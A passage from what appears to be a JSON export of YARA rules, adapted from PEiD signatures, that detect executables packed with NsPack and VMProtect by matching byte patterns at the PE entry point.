NsPack_31_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v23_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_httpwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V29_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 8A 06 3C 00 74 12 8B F5 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_23_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V33_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_1x2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_34_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 108,
            "key": "yara_detect_vmprotect",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_vmprotect",
            "rule": "rule VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect246_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 60 C7 ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 50 52 }\r\n        $b = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $c = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 06 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_180_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_1704_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $b = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 53 56 52 56 51 9C 55 57 68 00 00 00 00 8B 74 24 2C 89 E5 81 EC C0 00 00 00 89 E7 03 75 00 8A 06 46 0F B6 C0 FF 34 85 A7 72 45 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}"
        }
    ]
}